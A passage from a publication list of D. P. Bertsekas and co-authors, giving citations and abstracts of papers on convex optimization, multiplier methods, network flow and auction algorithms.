Inherently Parallel Algorithms in Feasibility and Optimization and Their Applications\", D. Butnariu, Y. Censor, and S. Reich, Eds., Elsevier, Amsterdam, 2001.\n\nAbstract: We propose and analyze a distributed asynchronous subgradient method for minimizing a convex function that consists of the sum of a large number of component functions. The idea is to distribute the computation of the component subgradients among a set of processors, which communicate only with a coordinator. The coordinator performs the subgradient iteration incrementally and asynchronously, by taking steps along the subgradients of the component functions that are available at the update time. The incremental approach has performed very well in centralized computation, and the parallel implementation should improve its performance substantially, particularly for typical problems where computation of the component subgradients is relatively costly.\n\n• A. Nedic and D. P. Bertsekas, \"Convergence Rate of Incremental Subgradient Algorithms,\" Stochastic Optimization: Algorithms and Applications (S. Uryasev and P. M. Pardalos, Editors), pp. 263-304, Kluwer Academic Publishers, 2000.\n\nAbstract: We consider a class of subgradient methods for minimizing a convex function that consists of the sum of a large number of component functions. This type of minimization arises in a dual context from Lagrangian relaxation of the coupling constraints of large scale separable problems. The idea is to perform the subgradient iteration incrementally, by sequentially taking steps along the subgradients of the component functions, with intermediate adjustment of the variables after processing each component function. This incremental approach has been very successful in solving large differentiable least squares problems, such as those arising in the training of neural networks, and it has resulted in a much better practical rate of convergence than the steepest descent method. In this paper, we present convergence results and estimates of the convergence rate of a number of variants of incremental subgradient methods, including some that use randomization. The convergence rate estimates are consistent with our computational results, and suggests that the randomized variants perform substantially better than their deterministic counterparts.\n\n• D. P. Bertsekas, and J. N. Tsitsiklis, \"Gradient Convergence in Gradient Methods with Errors,\" Report LIDS-P-2404, Lab. for Info. and Decision Systems, November 1997, SIAM J. on Optimization, Vol. 10, 2000, pp. 627-642.\n\nAbstract: For the classical gradient method and several deterministic and stochastic variants for unconstrained minimization, we discuss the issue of convergence of the gradient sequence and the attendant issue of stationarity of limit points of the iterate sequence. We assume that the cost function gradient is Lipschitz continuous, and that the stepsize diminishes to 0 and satisfies standard stochastic approximation conditions. We show that either the cost sequence diverges to - infinity or else the cost sequence converges to a finite value and the gradient sequence converges to 0 (with probability 1 in the stochastic case). Existing results assume various boundedness conditions, such as boundedness of the cost sequence or the gradient sequence or the iterate sequence, which we do not assume.\n\n• D. P. Bertsekas, \"A Note on Error Bounds for Convex and Nonconvex Programs, \" COAP (Comp. Optimization and Applications), Vol. 12, 1999, pp. 41-51.\n\nAbstract: Given a single feasible solution $x_F$ and a single infeasible solution $x_I$ of a mathematical program, we provide an upper bound to the optimal dual value. We assume that $x_F$ satisfies a weakened form of the Slater condition. We apply the bound to convex programs and we discuss its relation to Hoffman-like bounds. As a special case, we recover a bound due to Mangasarian [Man97] on the distance of a point to a convex set specified by inequalities.\n\n• C. C. Wu and D. P. Bertsekas, \"Distributed Power Control Algorithms for Wireless Networks,\" IEEE Trans. on Vehicular Technology, Vol. 50, pp. 504-514, 2001.\n\nAbstract: Power control has been shown to be an effective way to increase capacity in wireless systems. In previous work on power control, it has been assumed that power levels can be assigned from a continuous range. In practice, however, power levels are assigned from a discrete set. In this work, we consider the minimization of the total power transmitted over given discrete sets of available power levels subject to maintaining an acceptable signal quality for each mobile. We have developed distributed iterative algorithms for solving a more general version of this integer programming problem, which is of independent interest, and have shown that they find the optimal solution in a finite number of iterations which is polynomial in the number of power levels and the number of mobiles.\n\n• D. P. Bertsekas, \"A New class of Incremental Gradient Methods for Least Squares,\" SIAM J. on Optimization, Vol. 7, 1997, pp. 913-926.\n\nAbstract: The LMS method for linear least squares problems differs from the steepest descent method in that it processes data blocks one-by-one, with intermediate adjustment of the parameter vector under optimization. This mode of operation often leads to faster convergence when far from the eventual limit, and to slower (sublinear) convergence when close to the optimal solution. We embed both LMS and steepest descent, as well as other intermediate methods, within a one-parameter class of algorithms, and we propose a hybrid class of methods that combine the faster early convergence rate of LMS with the faster ultimate linear convergence rate of steepest descent. These methods are well-suited for neural network training problems with large data sets.\n\n• D. P. Bertsekas, \"Incremental Least Squares Methods and the Extended Kalman Filter,\" SIAM J. on Optimization, Vol. 6, 1996, pp. 807-822.\n\nAbstract: In this paper we propose and analyze nonlinear least squares methods, which process the data incrementally, one data block at a time. Such methods are well suited for large data sets and real time operation, and have received much attention in the context of neural network training problems. We focus on the Extended Kalman Filter, which may be viewed as an incremental version of the Gauss-Newton method. We provide a nonstochastic analysis of its convergence properties, and we discuss variants aimed at accelerating its convergence.\n\n• D. P. Bertsekas, \"Thevenin Decomposition and Network Optimization,\" J. of Optimization Theory and Applications, Vol. 89, 1996, pp. 1-15.\n\nAbstract: Thevenin's theorem, one of the most celebrated results of electric circuit theory, provides a two-parameter characterization of the behavior of an arbitrarily large circuit, as seen from two of its terminals. We interpret the theorem as a sensitivity result in an associated minimum energy/network flow problem, and we abstract its main idea to develop a decomposition method for convex quadratic programming problems with linear equality constraints, such as those arising in a variety of contexts such as Newton's method, interior point methods, and least squares estimation. Like Thevenin's theorem, our method is particularly useful in problems involving a system consisting of several subsystems, connected to each other with a small number of coupling variables.\n\n• D. P. Bertsekas and P. Tseng, \"Partial Proximal Minimization Algorithms for Convex Programming,\" SIAM J. on Optimization, Vol. 4, 1994, pp. 551-572.\n\nAbstract: We consider an extension of the proximal minimization algorithm where only some of the minimization variables appear in the quadratic proximal term. We interpret the resulting iterates in terms of the iterates of the standard algorithm and we show a uniform descent property, which holds independently of the proximal terms used. This property is used to give simple convergence proofs of parallel algorithms where multiple processors simultaneously execute proximal iterations using different partial proximal terms. We also show that partial proximal minimization algorithms are dual to multiplier methods with partial elimination of constraints, and we establish a relation between parallel proximal minimization algorithms and parallel constraint distribution algorithms.\n\n• D. P. Bertsekas and P. Tseng, \"On the Convergence of the Exponential Multiplier Method for Convex Programming,\" Math Programming, Vol. 60, pp. 1-19, 1993.\n\nAbstract: In this paper, we analyze the exponential method of multipliers for convex constrained minimization problems, which operates like the usual Augmented Lagrangian method, except that it uses an exponential penalty function in place of the usual quadratic. We also analyze a dual counterpart, the entropy minimization algorithm, which operates like the proximal minimization algorithm, except that it uses a logarithmic/entropy proximal'' term in place of a quadratic. We strengthen substantially the available convergence results for these methods, and we derive their convergence rate when applied to linear programs.\n\n• J. Eckstein and D. P. Bertsekas, \"On the Douglas-Ratchford Splitting Method and the Proximal Point Algorithm for Maximal Monotone Operators,\" Mathematical Programming, Vol. 55, 1992, pp. 293-318.\n\nAbstract: This paper shows, by means of an operator called a splitting operator, that the Douglas-Ratchford splitting method for finding a zero of the sum of two monotone operators is a special case of the proximal point algorithm. Therefor, applications of Douglas-Ratchford splitting, such as the alternating direction method of multipliers for convex programming decomposition, are also special cases of the proximal point algorithm. This observation allows the unification and generalization of a variety of convex programming algorithms. By introducing a modified version of the proximal point algorithm, we derive a new, generalized alternating direction method of multipliers for convex programming. Advances of this sort illustrate the power and generality gained by adopting monotone operator theory as a conceptual framework.\n\n• P. Tseng and D. P. Bertsekas, \"Relaxation Methods for Strictly Convex Costs and Linear Constraints,\" Mathematics of Operations Research, Vol. 16, 1991 pp. 462-481.\n\nAbstract: Consider the problem of minimizing a stritcly convex (possibly nondifferentiable) cost subject to linear constraints. We propose a dual coordinate ascent method for this problem that uses inexact line search and either essentially cyclic or Gauss-Southwell order of coordinate relaxation. We show, under very weak conditions, that this method generates a sequence of primal vectors converging to the optimal primal solution. Under an additional regularity assumption, and assuming that the effective domain of the cost function is polyhedral, we show that a related sequence of dual vectors converges in cost to the optimal cost. If the constraint set has an interior point in the effective domain of the cost function, then this sequence of dual vectors is bounded and each of its limit points is an optimal dual solution. When the cost function is strongly convex, we show that the order of coordinate relaxation can become progressively more chaotic. These results significantly improve upon those obtained previously.\n\n• P. Tseng and D. P. Bertsekas, \"Relaxation Methods for Monotropic Programs,\" Math. Programming, Vol. 46, (1990), pp. 127--151.\n\nAbstract: We propose a dual ascent method for the problem of minimizing a convex, possibly nondifferentiable, separable cost subject to linear constraints. The method has properties reminiscent of the Gauss-Seidel method in numerical analysis and uses the epsilon-complemetary slackness mechanism introduced in Bertsekas, Hosein and Tseng (1987) to ensure finite convergence to near optimality. As special cases we obtain the methods in Bertsekas, Hosein and Tseng (1987) for network flow programs and the methods in Tseng and Bertsekas (1987) for linear programs.\n\n• J. Dunn and D. P. Bertsekas, \"Efficient Dynamic Programming Implementations of Newton's Method for Unconstrained Optimal Control Problems,\" J. Opt. Theory and Appl., Vol. 63, 1989, pp. 23-38.\n\nAbstract: Naive implementations of Newton's method for unconstrained N-stage discrete-time optimal control problems with Bolza objective functions tend to increase in cost like N^3 as N increases. However, if the inherent recursive structure of the Bolza problem is properly exploited, the cost of computing a Newton step will increase only linearly with N. The efficient Newton implementation scheme proposed here is similar to Mayne's DDP (differential dynamic programming) method but produces the Newton step exactly, even when the dynamical equations are nonlinear. The proposed scheme is also related to a Riccati treatment of the linear, two-point boundary-value problems that characterize optimal solutions. For discrete-time problems, the dynamic programming approach and the Riccati substitution differ in an interesting way; however, these differences essentially vanish in the continuous-time limit.\n\n• P. Tseng and D. P. Bertsekas, \"Relaxation Methods for Linear Programs,\" Math. of Operations Research, Vol. 12, (1987), pp. 569--596.\n\nAbstract: In this paper we propose a new method for solving linear programs. This method may be viewed as a generalized coordinate descent method whereby the descent directions are chosen from a finite set. The generation of the descent directions are based on results from monotropic programming theory. The method may be alternatively viewed as an extension of the relaxation method for network flow problems , . Node labeling, cuts, and flow augmentation paths in the network case correspond to, respectively, tableau pivoting, rows of tableaus, and columns of tableaus possessing special sign patterns in the linear programming case.\n\n• E. M. Gafni, and D. P. Bertsekas, \"Two-Metric Projection Methods for Constrained Optimization,\" SIAM J. on Control and Optimization, Vol. 22, 1984, pp. 936-964.\n\nAbstract: This paper is concerned with the problem min{f(x)|x\\in X}, where X is a convex subset of a linear space H, and f is a smooth real-valued function on H. We propose the class of methods x_{k+1}=P(x_k-\\alpha_k g_k), where P denotes projection on X with respect to the Hilbert space norm ||.||, g_k denotes the Frechet derivative of f at x_k with respect to another Hilbert space norm ||.||_k on H, and \\alpha_k is a positive scalar stepsize. We thus remove an important restriction in the original proposal of Goldstein, and Levitin and Poljak, where the norms ||.|| and ||.||_k must be the same. It is therefore possible to match the norm ||.|| with the structure of X so that the projection operation is simplified while at the same time reserving the option to choose ||.||_k on the basis of approximations to the Hessian of f so as to attain a typically superlinear rate of convergence. The resulting methods are particularly attractive for large-scale problems with specially structured constraint sets such as optimal control and nonlinear multi-commodity network flow problems. The latter class of problems is discussed in some detail.\n\n• D. P. Bertsekas, G. S, Lauer, N. R. Sandell, and T. A. Posbergh, \"Optimal Short-Term Scheduling of Large-Scale Power Systems,\" IEEE Trans. on Aut. Control, Vol. AC-28, 1983, pp. 1-11.\n\nAbstract: This paper is concerned with the long-standing problem of optimal unit commitment in an electric power system. We follow the traditional formulation of this problem which gives rise to a large-scale, dynamic, mixed-integer programming problem. We describe a solution methodology based on duality, Lagrangian relaxation and nondifferentiable optimization that has two unique features. First, computational requirements typically grow only linearly with the number of generating units. Second, the duality gap decreases in relative terms as the number of units increases, and as a result our algorithm tends to actually perform better for problems of large size. This allows for the first time consistently reliable solution of large practical problems involving several hundreds of units within realistic time constraints. Aside from the unit commitment problem, this methodology is applicable to a broad class of large-scale dynamic scheduling and resource allocation problems involving integer variables.\n\n• D. P. Bertsekas, and N. R. Sandell, \"Estimates of the Duality Gap for large-Scale Separable Nonconvex Optimization Problems,\" Proc. of 21st IEEE Conference on Decision and Control, Volume 21, Part 1, Dec. 1982, pp. 782 - 785.\n\nAbstract: We derive some estimates of the duality gap for separable constrained optimization problems involving nonconvex, possibly discontinuous, objective functions, and nonconvex, possibly discrete, constraint sets. The main result is that as the number of separable terms increases to infinity the duality gap as a fraction of the optimal cost decreases to zero. The analysis is related to the one of Aubin and Ekeland, and is based on the Shapley-Folkman theorem. Our assumptions are different and our estimates are sharper and more convenient for integer programming problems.\n\n• D. P. Bertsekas and E. Gafni, \"Projection Methods for Variational Inequalities with Applications to the Traffic Assignment Problem,\" Math. Progr. Studies, Vol. 17, 1982, pp. 139-159.\n\nAbstract: It is well known [2, 3, 16] that if $\\bar T:\\Rn\\mapsto\\Rn$ is a Lipschitz continuous, strongly monotone operator and $X$ is a closed convex set, then a solution $x^*\\in X$ of the variational inequality$(x-x^*)'\\bar T(x^*)\\geq 0$, for all $x\\in X$, can be found iteratively by means of the projection method $x_{k+1}=P_X[x_k-\\alpha \\bar T(x_k)]$, $x_0\\in X$, provided the stepsize $\\alpha$ is sufficiently small. We show that the same is true if $\\bar T$ is of the form $\\bar T=A'TA$ where $A:\\Rn\\mapsto\\Rm$ is a linear mapping, provided $T:\\Rm\\mapsto\\Rm$ is Lipschitz continuous and strongly monotone, and the set $X$ is polyhedral. This fact is used to construct an effective algorithm for finding a network flow which satisfies given demand constraints, and is positive only on paths of minimum delay or travel time.\n\n• D. P. Bertsekas, \"Projected Newton Methods for Optimization Problems with Simple Constraints,\" SIAM J. Control and Optimization, Vol. 20, 1982, pp. 221-246.\n\nAbstract: We consider the problem min{f(x)|x>=0} and propose algorithms of the form x_{k+1}=P(x_k-a_kD_k grad f(x_k)) where P denotes projection on the positive orthant, a_k is a stepsize chosen by an Armijo-like rule, and D_k is a positive definite symmetric matrix, which is partly diagonal. We show that D_k can be calculated simply on the basis of second derivatives of f so that the resulting Newton-like algorithm has a typically superlinear rate of convergence. With other choices of D_k convergence at a typically linear rate is obtained. The algorithms are almost as simple as their unconstrained counterparts. They are well suited for problems of large dimension such as those arising in optimal control while being competitive with existing methods for low-dimensional problems. The effectiveness of the Newton-like algorithm is demonstrated via computational examples involving as many as 10,000 variables. Extensions to general linearly constrained problems are also provided. These extensions utilize a notion of an active generalized rectangle patterned after the notion of an active manifold used in maniforld suboptimization methods, By contrast with these methods, many constraints can be added or subtracted from the binding set at each iteration without the need to solve a quadratic programming problem.\n\n• D. P. Bertsekas, \"Enlarging the Region of Convergence of Newton's Method for Constrained Optimization,\" J. Optimization Th. and Applications, Vol. 36, 1982, pp. 221-252.\n\nAbstract: In this paper, we consider Newton's method for solving the system of necessary optimality conditions of optimization problems with equality and inequality constraints. The principal drawbacks of the method are the need for a good starting point, the inability to distinguish between local maxima and local minima, and when inequality constraints are present, the necessity to solve a quadratic programming problem at each iteration. We show that all these drawbacks can be overcome to a great extent without sacrificing the superlinear convergence rate by making use of exact differentiable penalty functions introduced by Di Pillo and Grippo. We also show that there is a close relationship between the class of penalty functions of Di Pillo and Grippo and the class of Fletcher, and that the region of convergence of a variation of Newton's method can be enlarged by making use of one of Fletcher's penalty functions.\n\n• D. P. Bertsekas, \"Convexification Procedures and Decomposition Methods for Nonconvex Optimization Problems,\" J. of Optimization Theory and Applications, Vol. 29, 1979, pp. 169-197.\n\nAbstract: In order for primal-dual methods to be applicable to a constrained minimization problem, it is necessary that restrictive convexity conditions are satisfied. In this paper, we consider a procedure by means of which a nonconvex problem is convexified and transformed into one which can be solved with the aid of primal-dual methods. Under this transformation, separability of the type necessary for application of decomposition algorithms is preserved. This feature extends the range of applicability of such algorithms to nonconvex problems. Relation with multiplier methods are explored with the aid of a local version of a conjugate convex function.\n\n• D. P. Bertsekas, \"Local Convex Conjugacy and Fenchel Duality,\" Preprints of Triennial World Congress of IFAC, Helsinki, June 1978, Vol. 2, 1978, pp. 1079-1084.\n\nAbstract: In this paper we introduce a notion of a convex conjugate function of a nonlinear function defined on a manifold specified by nonlinear equality constraints. Under certain assumptions the conjugate is defined locally around a point and upon conjugation yields the original function. Local versions of the Fenchel duality theorem are also proved.\n\n• D. P. Bertsekas, \"On the Convergence Properties of Second-Order Multiplier Methods,\" J. of Optimization Theory and Applications, Vol. 25, 1978, pp. 443-449.\n\nAbstract: The purpose of this note is to provide some estimates relating to Newton-type methods of multipliers. These estimates can be used to infer that convergence in such methods can be achieved for an arbitrary choice of the initial multiplier vector by selecting the penalty parameter sufficiently large.\n\n• D. P. Bertsekas, \"Approximation Procedures Based on the Method of Multipliers,\" J. of Optimization Theory and Applications, Vol. 23, 1977.\n\nAbstract: In this paper, we consider a method for solving certain optimization problems with constraints, nondifferentiabilities, and other ill-conditioning terms in the cost functional by approximating them by well-behaved optimization problems. The approach is based on the method of multipliers. The convergence properties of the methods proposed can be inferred from corresponding properties of multiplier methods with partial elimination of constraints. A related analysis is provided in this paper.\n\n• D. P. Bertsekas, \"Multiplier Methods: A Survey,\" Automatica, Vol. 12, 1976, pp. 133-145.\n\nAbstract: The purpose of this paper is to provide a survey of convergence and rate of convergence aspects of a class of recently proposed methods for constrained minimization - the, so called, multiplier methods. The results discussed highlight the operational aspects of multiplier methods and demonstrate their significant advantages over ordinary penalty methods.\n\n• D. P. Bertsekas, \"On Penalty and Multiplier Methods for Constrained Minimization,\" SIAM J. on Control and Optimization, Vol. 14, 1976, pp. 216-235.\n\nAbstract: In this paper we consider a generalized class of quadratic penalty function methods for the solution of nonconvex nonlinear programming problems. This class contains as special cases both the usual quadratic penalty function method and the recently proposed multiplier method. We obtain convergence and rate of convergence results for the sequences of primal and dual variables generated. The convergence results for the multiplier method are global in nature and constitute a substantial improvement over existing local convergence results. The rate of convergence results show that the multiplier method should be expected to converge considerably faster than the pure penalty method. At the same time, we construct a global duality framework for nonconvex optimization problems. The dual functional is concave, everywhere finite, and has strong differentiability properties. Furthermore, its value, gradient and Hessian matrix within an arbitrary bounded set can be obtained by uncon- strained minimization of a certain augmented Lagrangian.\n\n• D. P. Bertsekas, \"On the Goldstein-Levitin-Polyak Gradient Projection Method,\" IEEE Trans. on Aut. Control, Vol. AC-21, 1976.\n\nAbstract: This paper considers some aspects of the gradient projection method proposed by Goldstein, Levitin and Polyak, and more recently, in a less general context by McCormick. We propose and analyze some convergent step-size rules to be used in conjunction with the method. These rules are similar in spirit to the efficient Armijo rule for the method of steepest descent and under mild assumptions, they have the desirable property that they identify the set of active inequality constraints in a finite number of iterations.\n\n• D. P. Bertsekas, \"A New Algorithm for Solution of Resistive Networks Involving Diodes,\" IEEE Trans. on Circuits and Systems, Vol. CAS-23, 1976, pp. 599-608.\n\nAbstract: The solution of electric network problems by various algorithms such as for example Newton's method is often hampered by the presence of physical diodes with steeply rising exponential characteristics which cause overflow and slow convergence during numerical computation. In this paper we propose and analyze an algorithm which bypasses these difficulties by successively approximating the steep diode characteristics by smoother exponential functions. The algorithm may be modified to be used in the presence of ideal diodes and is related to penalty and multiplier methods for constrained minimization and Davidenko's method for solving certain ill-conditioned systems of nonlinear equations.\n\n• D. P. Bertsekas, \"Combined Primal-Dual and Penalty Methods for Constrained Minimization,\" SIAM J. on Control, Vol. 13, pp. 521-544, 1975.\n\nAbstract: In this paper we consider a class of combined primal-dual and penalty methods often called methods of multipliers. The analysis focuses mainly on the rate of convergence of these methods. It is shown that this rate is considerably more favorable than the corresponding rate for penalty function methods. Some efficient versions of multiplier methods are also considered whereby the intermediate unconstrained minimizations involved are approximate and only asymptotically exact. It is shown that such approximation schemes may lead to a substantial deterioration of the convergence rate, and a special approximation scheme is proposed which exhibits the same rate as the method with exact minimization. Finally, we analyze the properties of the step size rule of the multiplier method in relation to other possible step sizes, and we consider a modified step size rule for the case of the convex programming problem.\n\n• D. P. Bertsekas, \"Necessary and Sufficient Conditions for a Penalty Method to be Exact,\" Mathematical Programming, Vol. 9, pp. 87-99, 1975.\n\nAbstract: This paper identifies necessary and sufficient conditions for a penalty method to yield an optimal solution or a Lagrange multiplier of a convex programming problem by means of a single unconstrained minimization. The conditions are given in terms of properties of the objective and constraint functions of the problem as well as the penalty function adopted. It is shown among other things that all linear programs with finite optimal value satisfy such conditions when the penalty function is quadratic.\n\n• D. P. Bertsekas, \"Nondifferentiable Optimization via Approximation,\" in Mathematical Programming Study 3, Nondifferentiable Optimization, M. L. Balinski, P. Wolfe, (eds.), North-Holland Publ. Co., pp. 1-15, 1975.\n\nAbstract: This paper presents a systematic approach for minimization of a wide class of nondifferentiable functions. The technique is based on approximation of the nondifferentiable function by a smooth function and is related to penalty and multiplier methods for constrained minimization. Some convergence results are given and the method is ilustrated by means of examples from nonlinear programming.\n\n• D. P. Bertsekas, \"On the Method of Multipliers for Convex Programming,\" IEEE Transactions on Aut. Control, June 1975, pp. 385-388.\n\nAbstract: It is known that the method of multipliers for constrained minimization can be viewed as a fixed stepsize gradient method for solving a certain dual problem. In this short paper it is shown that for convex programming problems the method converges globally for a wide range of possible stepsizes. This fact is proved for both cases where unconstrained minimization is exact and approximate. The results provide the basis for considering modifications of the basic stepsize of the method of multipliers which are aimed at acceleration of its speed of convergence. A few such modifications are discussed and some computational results are presented relating to a problem in optimal control.\n\n• D. P. Bertsekas, \"Necessary and Sufficient Conditions for Existence of an Optimal Portfolio,\" Journal of Economic Theory, Vol. 8, No. 2, pp. 235-247, 1974.\n\nAbstract: This paper identifies necessary and sufficient conditions for existence of a solution to a class of optimization problems under uncertainty. This class includes certain problems of optimal portfolio selection when rates of return of risky assets are uncertain, as well as problems of optimal choice of inputs and outputs by a perfectly competitive firm facing uncertain prices.\n\n• D. P. Bertsekas, \"Partial Conjugate Gradient Methods for a Class of Optimal Control Problems,\" IEEE Trans. on Aut. Control, Vol. AC-19, 1974, pp. 209-217.\n\nAbstract: In this paper we examine the computational aspects of a certain class of discrete-time optimal control problems. We propose and analyze two partial conjugate gradient algorithms which operate in cycles of s+1 conjugate gradient steps (s\\le n = space dimension). The algorithms are motivated by the special form of the Hessian matrix of the cost functional. The first algorithm exhibits a linear convergence rate and offers some advantages over steepest descent in certain cases such as when the system is unstable. The second algorithm requires second-order information with respect to the control variables at the beginning of each cycle and exhibits (s+1)-step superlinear convergence rate. Furthermore, it solves a linear-quadratic problem in s+1 steps as compared with the mN steps (m = control space dimension, N = number of stages) required by the ordinary conjugate gradient method.\n\n• D. P. Bertsekas, \"Stochastic Optimization Problems with Nondifferentiable Cost Functionals,\" Journal of Optimization Theory and Applications, Vol. 12, 1973. pp. 218-231.\n\nAbstract: In this paper, we examine a class of stochastic optimization problems characterized by nondifferentiability of the objective function. It is shown that, in many cases, the expected value of the objective function is differentiable and, thus, the resulting optimization problem can be solved by using classical analytical or numerical methods. Te results are subsequently applied to the solution of a problem of economic resource allocation.\n\n• D. P. Bertsekas, and S. K. Mitter, \"A Descent Numerical Method for Optimization Problems with Nondifferentiable Cost Functionals,\" SIAM Journal on Control, Vol. 11, 1973, pp. 637-652.\n\nAbstract: In this paper we consider the numerical solution of convex optimization problems with nondifferentiable cost functionals. We propose a new algorithm, the epsilon-subgradient method, a large step, double iterative algorithm which converges rapidly under very general assumptions. We discuss the application of the algorithm in some problems of nonlinear programming and optimal control and we show that the epsilon-subgradient method contains as a special case a minimax algorithm due to Pschenichnyi.\n\n• B. W. Kort and D. P. Bertsekas, \"A New Penalty Function Method for Constrained Minimization,\" Proc. of 1972 IEEE Conference on Decision and Control, New Orleans, La., 1972, pp. 162-166.\n\nAbstract: During recent years it has been shown that the performance of penalty function methods for constrained minimization can be improved significantly by introducing gradient type iterations for solving the dual problem. In this paper we present a new penalty function algorithm of this type which offers significant advantages over existing schemes for the case of the convex programming problem. The algorithm treats inequality constraints explicitly and can also be used for the solution of general mathematical programming problems.\n\n• D. P. Bertsekas, and S. K. Mitter, \"Steepest Descent for Optimization Problems with Nondifferentiable Cost Functionals,\" Proc. of Princeton Conference on Information Sciences and Systems, 1971, pp. 347-351.\n\n• D. P. Bertsekas, \"Note on the Design of Linear Systems with Piecewise Constant Gains,\" IEEE Transactions on Automatic Control, 1970, pp. 262-263.\n\n• D. P. Bertsekas, \"Auction Algorithms for Path Planning, Network Transport, and Reinforcement Learning,\" Arizona State University/SCAI Report, July 2022; this is an updated version of a paper posted at arXiv:22207.09588. We consider some classical optimization problems in path planning and network transport, and we introduce new auction-based algorithms for their optimal and suboptimal solution. The algorithms are based on mathematical ideas that are related to competitive bidding for attaining market equilibrium, which underlie auction processes. However, their starting point is different, namely weighted and unweighted path construction in directed graphs, rather than assignment of persons to objects. The new algorithms have several potential advantages over existing methods: they are empirically faster in some important contexts, such as max-flow, they are well-suited for on-line replanning, and they can be adapted to distributed operation. Moreover, they can take advantage of reinforcement learning methods that use off-line training with data, as well as on-line training during real-time operation.\n\n• D. P. Bertsekas, \"Centralized and Distributed Newton Methods for Network Optimization and Extensions,\" Lab. for Information and Decision Systems Report LIDS-P-2866, MIT, April 2011.\n\nAbstract: We consider Newton methods for common types of single commodity and multi-commodity network flow problems. Despite the potentially very large dimension of the problem, they can be implemented using the conjugate gradient method and low-dimensional network operations, as shown nearly thirty years ago. We revisit these methods, compare them to more recent proposals, and describe how they can be implemented in a distributed computing system. We also discuss generalizations, including the treatment of arc gains, linear side constraints, and related special structures.\n\n• A. E. Ozdaglar and D. P. Bertsekas, \"Optimal Solution of Integer Multicommodity Flow Problems with Application in Optical Networks,\" Proc. of Symposium on Global Optimization, Santorini, Greece, June 2003; Frontiers in global optimization, pp. 411--435, Nonconvex Optim. Appl., 74, Kluwer Acad. Publ., Boston, MA, 2004.\n\nAbstract: In this paper, we propose methods for solving broadly applicable integer multicommodity flow problems. We focus in particular on the problem of routing and wavelength assignment (RWA), which is critically important for increasing the efficiency of wavelength-routed all-optical networks. Our methodology can be applied as a special case to the problem of routing in a circuit-switched network. We discuss an integer-linear programming formulation, which can be addressed with highly efficient linear (not integer) programming methods, to obtain optimal or nearly optimal solutions. Note: A comparative computational evaluation of the methodology of this paper is given in the thesis by Ali Meli.\n\n• A. E. Ozdaglar and D. P. Bertsekas, \"Routing and Wavelength Assignment in Optical Networks,\" Report LIDS-P-2535, Dec. 2001; IEEE Trans. on Networking, no. 2, Apr. 2003, pp. 259-272.\n\nAbstract: The problem of routing and wavelength assignment (RWA) is critically important for increasing the efficiency of wavelength-routed all-optical networks. Given the physical network structure and the required connections, the RWA problem is to select a suitable path and wavelength among the many possible choices for each connection so that no two paths sharing a link are assigned the same wavelength. In work to date, this problem has been formulated as a difficult integer programming problem that does not lend itself to efficient solution or insightful analysis. In this work, we propose several novel optimization problem formulations that offer the promise of radical improvements over the existing methods. We adopt a (quasi-)static view of the problem and propose new integer-linear programming formulations, which can be addressed with highly efficient linear (not integer) programming methods and yield optimal or near-optimal RWA policies. The fact that this is possible is surprising, and is the starting point for new and greatly improved methods for RWA. Aside from its intrinsic value, the quasi-static solution method can form the basis for suboptimal solution methods for the stochastic/dynamic settings. Note: A comparative computational evaluation of the methodology of this paper is given in the thesis by Ali Meli.\n\n• P. Tseng, and D. P. Bertsekas, \"An Epsilon-Relaxation Method for Separable Convex Cost Generalized Network Flow Problems,\" Math. Programming, Vol. 88, 2000, pp. 85-104.\n\nAbstract: We generalize the epsilon-relaxation method of for the single commodity, separable convex cost network flow problem to network flow problems with positive gains. We show that the method terminates with a near optimal solution, and we provide an associated complexity analysis.\n\n• D. P. Bertsekas, L. C. Polymenakos, and P. Tseng, \"Epsilon-Relaxation and Auction Methods for Separable Convex Cost Network Flow Problems,\" in Network Optimization, by P. M. Pardalos, D. W. Hearn, and W. W. Hager (eds.), Lecture Notes in Economics and Mathematical Systems, Springer-Verlag, N.Y., 1998, pp. 103-126; also given in the book by Bertsekas \"Network Optimization: Continuous and Discrete Models,\" Athena Scientific, 1998.\n\nAbstract: We consider a generic auction method for the solution of the single commodity, separable convex cost network flow problem. This method provides a unifying framework for the $\\e$-relaxation method and the auction/sequential shortest path algorithm and, as a consequence, we develop a unified complexity analysis for the two methods. We also present computational results showing that these methods are much faster than earlier relaxation methods, particularly for ill-conditioned problems.\n\n• D. P. Bertsekas, L. C. Polymenakos, and P. Tseng, \"An Epsilon-Relaxation Method for Convex Network Optimization Problems,\" SIAM J. on Optimization, Vol. 7, 1997, pp. 853-870.\n\nAbstract: We propose a new method for the solution of the single commodity, separable convex cost network flow problem. The method generalizes the $\\e$-relaxation method developed for linear cost problems, and reduces to that method when applied to linear cost problems. We show that the method terminates with a near optimal solution, and we provide an associated complexity analysis. We also present computational results showing that the method is much faster than earlier relaxation methods, particularly for ill-conditioned problems.\n\n• D. P. Bertsekas, F. Guerriero, and R. Musmanno, \"Parallel Asynchronous Label Correcting Methods for Shortest Paths,\" J. of Optimization Theory and Applications, Vol. 88, 1996, pp. 297-320.\n\nAbstract: In this paper we develop parallel asynchronous implementations of some known and some new label correcting methods for finding a shortest path from a single origin to all the other nodes of a directed graph. We compare these implementations on a shared memory multiprocessor, the Alliant FX/80, using several types of randomly generated problems. Excellent (sometimes superlinear) speedup is achieved with some of the methods, and it is found that the asynchronous versions of these methods are substantially faster than their synchronous counterparts.\n\n• D. P. Bertsekas, \"An Auction Algorithm for the Max-Flow Problem,\" J. of Optimization Theory and Applications, Vol. 87, 1995, pp. 69-101.\n\nAbstract: We propose a new algorithm for the max-flow problem. It consists of a sequence of augmentations along paths constructed by an auction-like algorithm. These paths are not necessarily shortest, that is, they need not contain a minimum number of arcs. However, they typically can be found with much less computation than the shortest augmenting paths used by competing methods. Our algorithm outperforms these latter methods as well as state-of-the-art preflow-push algorithms by a very large margin in tests with standard randomly generated problems.\n\n• D. P. Bertsekas, S. Pallottino, and M. G. Scutella, \"Polynomial Auction Algorithms for Shortest Paths,\" Computational Optimization and Applications , Vol. 4, 1995, pp. 99-125.\n\nAbstract: In this paper we consider strongly polynomial variations of the auction algorithm for the single origin/many destinations shortest path problem. These variations are based on the idea of graph reduction, that is, deleting unnecessary arcs of the graph by using certain bounds naturally obtained in the course of the algorithm. We study the structure of the reduced graph and we exploit this structure to obtain algorithms with $O\\bl(n\\min\\{m,n\\log n\\}\\br)$ and $O(n^2)$ running time. Our computational experiments show that these algorithms outperform their closest competitors on randomly generated dense all destinations problems, and on a broad variety of few destination problems.\n\n• D. P. Bertsekas, \"An Auction/Sequential Shortest Path Algorithm for the Minimum Cost Flow Problem,\" Report LIDS-P-2146, Lab. for Info. and Decision Systems, Revision of Feb. 1995.\n\nAbstract: We propose a new algorithm for the solution of the linear minimum cost network flow 